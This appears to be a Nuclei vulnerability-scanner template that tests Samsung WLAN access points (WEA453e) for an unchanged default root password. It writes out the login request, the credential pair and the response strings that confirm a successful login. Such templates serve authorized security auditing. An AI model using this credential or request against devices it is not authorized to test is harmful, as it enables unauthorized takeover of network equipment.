id: samsung-wlan-default-login

info:
  name: Samsung Wlan AP (WEA453e) Default Login
  author: pikpikcu
  severity: high
  description: Samsung Wlan AP (WEA453e) default root credentials were discovered.
  reference:
    - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: samsung,default-login

requests:
  - raw:
      - |
        POST /main.ehp HTTP/1.1
        Host: {{Hostname}}

        httpd;General;lang=en&login_id={{username}}&login_pw={{password}}

    payloads:
      username:
        - root
      password:
        - sweap12~
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "document.formParent2.changepasswd1.value"
          - "passwd_change.ehp"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/11
